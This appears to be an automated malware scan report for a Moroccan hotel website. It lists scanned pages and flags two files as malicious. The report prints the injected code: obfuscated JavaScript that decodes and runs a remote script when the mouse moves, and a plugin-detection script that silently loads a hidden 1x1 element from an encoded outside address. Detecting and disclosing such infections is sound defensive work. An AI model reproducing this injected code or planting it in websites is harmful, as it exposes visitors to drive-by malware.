Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hotelsmorocco.eu
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hotelsmorocco.eu/ | 200 OK Content-Length: 17347 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ottjxy2h1l for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://www.hotelsmorocco.eu/css.js | 200 OK Content-Length: 26006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3N5c2Zvcm1lMTAyMi5jby5jYy9tYWluLnBocD9wYWdlPTIwNTkwN2Y5ZjE4YzFkNmQ=')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports:
| ||
http://www.hotelsmorocco.eu/js/logo.js | 200 OK Content-Length: 161 Content-Type: application/javascript | clean |
http://www.hotelsmorocco.eu/js/link.js | 200 OK Content-Length: 149 Content-Type: application/javascript | clean |
http://www.hotelsmorocco.eu/js/about.js | 200 OK Content-Length: 184 Content-Type: application/javascript | clean |
http://www.hotelsmorocco.eu/js/contact.js | 200 OK Content-Length: 188 Content-Type: application/javascript | clean |
http://www.hotelsmorocco.eu/nl/ | 200 OK Content-Length: 15448 Content-Type: text/html | clean |
http://www.hotelsmorocco.eu/js/logo-nl.js | 200 OK Content-Length: 187 Content-Type: application/javascript | clean |
http://www.hotelsmorocco.eu/js/link-nl.js | 200 OK Content-Length: 174 Content-Type: application/javascript | clean |
http://www.hotelsmorocco.eu/js/over.js | 200 OK Content-Length: 187 Content-Type: application/javascript | clean |
http://www.hotelsmorocco.eu/js/contact-nl.js | 200 OK Content-Length: 185 Content-Type: application/javascript | clean |
http://www.hotelsmorocco.eu/nl/casablanca/hyatt-regency/ | 200 OK Content-Length: 7713 Content-Type: text/html | clean |
http://www.hotelsmorocco.eu/casablanca/hyatt-regency/ | 200 OK Content-Length: 6855 Content-Type: text/html | clean |
http://www.hotelsmorocco.eu/casablanca/ | 200 OK Content-Length: 16590 Content-Type: text/html | clean |
http://www.hotelsmorocco.eu/nl/casablanca/ | 200 OK Content-Length: 17642 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hotelsmorocco.eu
Result:
GET / HTTP/1.1
Host: hotelsmorocco.eu
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hotelsmorocco.eu
Referer: http://www.google.com/search?q=hotelsmorocco.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hotelsmorocco.eu
Referer: http://www.google.com/search?q=hotelsmorocco.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.